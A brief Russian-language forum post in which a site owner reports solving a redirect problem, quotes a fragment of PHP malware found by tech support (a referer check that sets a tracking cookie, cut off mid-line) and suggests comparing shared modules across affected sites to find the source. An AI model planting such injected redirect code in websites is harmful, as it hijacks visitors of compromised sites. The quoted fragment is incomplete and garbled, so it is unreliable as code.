Pillott (09.07.2012/15:12)..не каждык в коре буит ковыряцо еще..
С редиректом проблема решена. Вот что ответили в тех.поддержке
А вот собственно сам вредоносный код
[php]if($_SERVER['HTTP_REFERER'] =='')
{@setcookie("dir", 1, time()+60*60*24*7*30);}
elsei
Вычислить то просто: сравнить модули на сайтах с которых идёт редирект. Тоесь у кого одинаковые моды..